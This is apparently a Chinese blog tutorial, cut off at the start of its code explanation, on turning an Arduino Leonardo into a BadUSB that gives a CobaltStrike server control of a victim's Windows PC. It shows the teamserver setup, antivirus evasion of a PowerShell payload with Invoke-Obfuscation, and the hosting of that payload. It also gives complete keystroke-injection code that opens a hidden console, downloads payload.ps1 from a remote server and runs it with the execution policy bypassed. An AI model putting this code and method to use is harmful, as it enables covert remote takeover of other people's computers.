BadUSB实现CobaltStrike快速上线

背景介绍

最近接触到各种钓鱼方法，研究到U盘钓鱼的时候，决定搞个BadUSB玩玩。BadUSB漏洞是由安全研究人员Karsten Nohl 和 Jakob Lell 在 2014 年黑帽会议上首次发现并暴露出来的，这也就让USB安全和几乎所有和USB相关的设备（包括具有USB端口的电脑）都陷入相当危险的状态。

就狭义来说，BadUSB是指形似 U 盘的设备，内部的电路在上电之后会被系统识别为键盘，此时该设备内部的芯片开始与电脑进行键盘通讯，仿照人的输入习惯，来操作电脑，以此达到骇入电脑的目的。

就广义来说，BadUSB是指一切会被电脑识别为 HID 设备的，外观却不像键盘的电子设备。现阶段有的 BadUSB是形似数据线的，有的则是手机加定制内核，以发挥 BadUSB 的作用，更有甚者，将 BadUSB 开发为模块，可以嵌入任意的带 USB 接口的设备中。

本文旨在交流技术，严禁从事不正当活动。网络不是法外之地，争做遵纪守法好公民。

实现工具及环境

BadUSB Leonardo开发板
Arduino IDE_v1.8.5
CobaltStrike 4.0
Server酱
Ubuntu 20.04.4(CS服务端、木马服务器)、Windows10(CS客户端)、Windows10(受害者)

链接：https://pan.baidu.com/s/1UQI9GldqY8T3CIRrmDy7Pw
提取码：r1c4

复现步骤

前期准备

CobaltStrike启动服务端

./teamserver xxx.xxx.xxx 123456

CobaltStrike客户端登录，添加监听器

受害机为Windows系统，对于exe的木马会比较敏感，所以我们生成powershell的木马

保存在桌面命名为payload.ps1，查杀了一下被杀软过滤了，需要对这个马做一下免杀，PowerShell的免杀可以用Invoke-Obfuscation，进入目录执行powershell命令

Invoke-Obfuscation GitHub地址

set-executionpolicy remotesigned
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

然后执行命令，指定待处理的Ps1文件
或者指定待处理的ps代码

set scriptpath c:\xxx\payload.ps1
set scriptblock 'echo xss'

输入encoding并选择编码方式，比如1，这里我选择混淆两次ascii按两次1两次回车就完事儿了

导出免杀ps文件到指定路径

out C:\xxx\xxx.ps1

到这里简单的免杀完成了，将这个马放到远程服务器上备用，我们可以用以下命令启动内置的Apache服务器，使受害者可以下载木马。访问可以看到服务器上的马

python2 -m SimpleHTTPServer [port]
or
python3 -m http.server [port]

烧录制作

下面我们可以进行badusb开发板的烧录
将硬件插入电脑，查看一下对应端口

打开Arduino IDE，工具->板->选择”Arduino Leonardo”和对应端口

将以下代码粘贴到arduino

#include<Keyboard.h>
void setup() {
  // putpower shell your setup code here, to run once
  Keyboard.begin();//开始键盘通讯 
delay(3000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD  /q /d /f:off /v:on /k MODE con: cols=15 lines=1");  //无回显
//Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //有回显
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell\n");
Keyboard.println("$clnt = new-object system.net.webclient;\n");
Keyboard.println("$url= 'http://xxx.xxx.xxx:xxxx/payload.ps1';\n");  //远程服务器ps1远控地址
Keyboard.println("$file = 'd:\\xxx.ps1';\n");      //下载到目标存放文件的地址
Keyboard.println("$clnt.downloadfile($url,$file)\n");  //采用分段执行绕过防火墙进程防护
Keyboard.println("powershell.exe -executionpolicy bypass -file d:\\xxx.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯 
}
 
void loop() {
  // put your main code here, to run repeatedly:
 
}

代码大体意思：